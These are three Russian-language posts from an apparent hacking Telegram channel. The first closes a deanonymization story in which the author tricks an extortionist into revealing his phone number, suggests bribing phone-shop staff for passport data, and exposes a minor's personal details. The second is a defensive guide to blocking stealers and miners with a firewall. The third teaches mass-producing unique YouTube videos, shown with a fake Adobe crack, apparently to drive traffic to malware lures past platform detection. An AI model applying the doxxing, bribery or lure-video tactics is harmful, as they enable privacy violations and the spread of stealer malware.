Информации которую мы получили с головой достаточно, чтобы засадить вымогателя в места не столь отдалённые. Но, наша цель состоит в полной деанонимизации особи, что поспособствует уходу с рынка + принудительном полном возврате всего украденного. Для этого нам следует узнать только полный номер телефона. Далее в ход смогут пойти продажные сотрудники сотовых салонов, которые за несколько сотен раздобудут даже паспортные данные. Чтобы узнать полный номер, мы воспользуемся безвыходной ситуацией для нашего вредителя, которую сейчас и создадим. Имитируя "кибер детектива" мы составили такое письмо и отправили его. По понятным причинам, проигнорировать такое будет самым глупым решением, когда тебе грозит срок.

СИ.: Уговорили написать в WhatsApp и узнали полный номер

Итоги

Я получил от него сообщение, узнав его полный номер. Остальную часть выкладывать не стану. Немного о нём: его родители умерли несколько лет назад в автокатастрофе, живёт он с бабушкой, учится в 10 классе. Меня очень просили не публиковать данные и даже предлагали деньги, на что я отказался. (от денег) Чтобы не портить жизнь, мы провели длинную беседу и он вернул всем средства, даже на наш канал подписался:) На данный момент все его аккаунты удалены, он пообещал мне не заниматься подобными делами. Подумайте несколько раз перед тем, как влезать в нелегал. Если вам будут писать подобные личности, пересылайте их сообщения мне на аккаунт. Таких методов деанонимизации уйма, мы использовали только один из них. Если тема вам интересна и вы хотите подобных статей дальше - пишите мне в личные сообщения.
И самое главное! Тем, кто не увидел дисклеймер: личность вымышлена, совпадения случайны, статья написана искусственным интеллектом.
Всем добра и мирного неба!

НАШ КАНАЛ: t.me/hack2day

Прощайте, стилеры / майнеры!

2023-03-19T20:46:06.419Z

Приветствую. Я практически полностью уверен в том, что после скачки какого-либо файла вы бежите проверять его используя VirusTotal / Windows Defender и/или прочие антивирусы. Спешу вас огорчить, новый вирус НИКОГДА не покажет детектов. Антивирусы работают по своим базам, чтобы код был "слит" в базы, вирусу нужно посетить минимум 1.000 компьютеров для адекватного анализа.
Да и о чём тут говорить, сейчас крипт за 10$ обходит крупнейшие антивирусы.
Но что же тогда делать? Рассмотрим универсальное решение, приятного чтения!
Не забываем поддерживать проект донатом на LZT / Подпиской на канал.

Анализируем работу вирусов

Чтобы противостоять потенциальной угрозе, нам нужно узнать основной принцип работы. Под мою руку попал RedLine Stealer (лидер рынка), который был скачан "пальцем в небо" на площадке YouTube. Что объединяет большинство вирусов? Они бесполезны без доступа к сети. Сделав дамп памяти я увидел, что Stealer`ы используют заготовленные пути, по которым они воруют данные и отправляют их протоколом TCP, используя случайный порт. В теории, мы могли бы использовать портативные версии приложений для того, чтобы "обмануть" вредонос, но это костыли. Есть идеальный, универсальный вариант — ограничить неизвестному приложению доступ к сети. Даже если ему удастся украсть данные, он не сможет их никуда отправить. Аналогичная ситуация с майнерами, кейлоггерами и прочими вирусами. Нагрузка будет минимальной, в отличие от антивирусов, которые шерстят всю систему каждых 2 секунды и вредят не хуже майнера.
Для этого мы будем использовать Firewall, который многие считают старьем,
но при правильной настройке эта штука утирает нос любому антивирусу!

Как работает Firewall

Предположим, мы скачали вирус, который отправляет ваши данные на какой-то сервер / майнит с вашего устройства. Фаервол создает "каменную стену", блокируя трафик для неизвестных приложений. Фактически, вирус сможет задействовать себя, собрать нужные файлы и совершить post запрос, но бесполезно. Запрос не сможет "пробить" нашу стену и останется в нашей оперативной памяти до тех пор, пока мы не перезагрузим устройство. Таким образом большинство вирусов стают бесполезными и безвредными:)

Реализация

Попытавшись настроить встроенный Firewall от Windows я не добился адекватного результата. Нужно было создавать правила доступа к сети для каждого приложения, что в принципе очень неудобно и непрактично. Все же, альтернатива нашлась: TinyWall. При выборе у меня были такие требования: бесперебойная работа, открытые исходники, без бесящих уведомлений. Я проверил около 7 аналогов которые либо платные и кидают кучу уведомлений с просьбой о подписке, либо пропускают трафик и не прошли моё личное тестирование. Скачать TinyWall можно на официальном сайте, исходники тут.

Настройка

Изначально софт не настроен и блокирует то, что в теории не нужно. (речь о браузере, мессенджерах и т.д.) Я бы посоветовал использовать "Автоматическое обучение". Это работает по такому принципу: вы используете систему несколько часов, как обычно. Firewall запоминает используемые программы и добавляет их в White-List. Обязательно проверьте перед этим систему антивирусом, чтобы не добавить уже присутствующие вирусы в "белый список"! Когда вы попользовались устройством несколько часов, смените режим работы на "Normal". Если какое-то новое приложение попытается соединиться с сервером, Firewall автоматически ограничит ему доступ к сети и сообщит вам об этом. Если вы считаете что программа безвредна, можно удобно выбрать её процесс и разрешить доступ к сети (пока вы не разрешите, она будет оффлайн). Так же можно разрешить принимать трафик в одностороннем режиме, без отправки. Использую это приложение более года и оно не подвело меня ни разу.

Итоги работы

Теперь нам не страшен никакой вирус, который взаимодействует с сетью. Все новые приложения будут "отключены" от сети. Даже самый дорогой крипт не сумеет такое обойти. Статья написана по просьбе нашего подписчика, который был взволнован после того, как мы маскировали Stealer под любой файл. Кстати, вы тоже можете предложить идею для новой статьи написав мне в Telegram.

НАШ КАНАЛ: t.me/hack2day

Креативы под пролив за минуту

2023-03-12T21:21:38.728Z

Приветствую! Перед началом, хочу поведать вам небольшую историю. В 2021 году мы с приятелем занимались переливом трафика на разных платформах, обладая неограниченным количеством аккаунтов была возможность заливать хоть тысячи креативов, но.. Креативы создавались далеко не за минуту, уходили часы времени, искусственные интеллекты не продвигали материал, который был ранее загружен на площадку. Использование специализированных программ для уникализации существенно портили картинку либо же не давали ожидаемого результата, пришлось изобретать альтернативу. Нам нужен был шаблон, который мы могли превратить в уникальный материал буквально в два клика, и у нас получилось. Приятного ознакомления, написано для канала HACK2DAY!

Выбираем примерочный материал

Искать особо не пришлось, возьмём одну из самых популярных тематик на форуме zelenka.guru — YouTube трафик. Суть: под каждый пролив нужно создавать уникальное видео, чтобы его продвинули алгоритмы, база. Естественно, под условный Google-Ads будет аналогично. Посмотрев примеры я заснял кусочек видео, который должен быть уникален для алгоритмов. В материале курируют главные детали, которые бросаются интеллекту: аудиодорожка, рабочий стол (который занимает около 90% всего видео). Если видео будет уникальным хоть на 60%, система нас продвигает. Теперь стоит вопрос: как нам менять рабочий стол на готовом видео в несколько кликов?

Подробнее о реализации

Мы будем использовать хромакей. Нужно записать фрагмент на зелёном фоне рабочего стола / создать маску под заготовленное видео. Используя хромакей мы сможем заменять статичный рабочий стол на любое видео, картинку и т.д, что и сыграет роль уникализации. Для проверки работоспособности, я обратился к своему подписчику трафферу, который немного лучше меня разбирается в этой сфере. Мы накрутили два видеоролика созданные под один шаблон, каналы 300-400 подписчиков. Результат можно наблюдать на картинке ниже.

Создаем шаблонное видео

В моем случае идёт запись рабочего стола. Устанавливаем зелёный цвет на обои и делаем нужные действия. Я же буду производить запуск псевдо кряка Adobe.

Примерочное видео на зелёном фоне

Переходим к монтажу

Выбираем любой видео редактор, нам потребуется только функция "Chroma Key". В моем случае используется Movavi Video Editor. Перекидываем заготовку на дорожку и выделяя видео переходим в настройки ХромаКея.

Настройка ChromaKey

Выделите зелёный пиксель и фон преобразуется в пустоту. Перейдя на сайт winzoro.net/wallpapers_all выбираем видео, которое заменит наш рабочий стол. Загрузите и перетащите его на слой ниже, как показано на скриншоте.
Если видео слишком короткое (как у меня) — дублируем его / замедляем.

Пример того, как правильно перенести видео

Звук должен быть уникальным на каждом шаблоне, не забывайте менять его.

Итоги работы

Мы создали многоразовый шаблон, который можем изменять в два клика и получать уникальный материал для заливов на платформе YouTube. Ниже можно глянуть уже готовое видео. Всем удачи и мирного неба над головой!

НАШ КАНАЛ: t.me/hack2day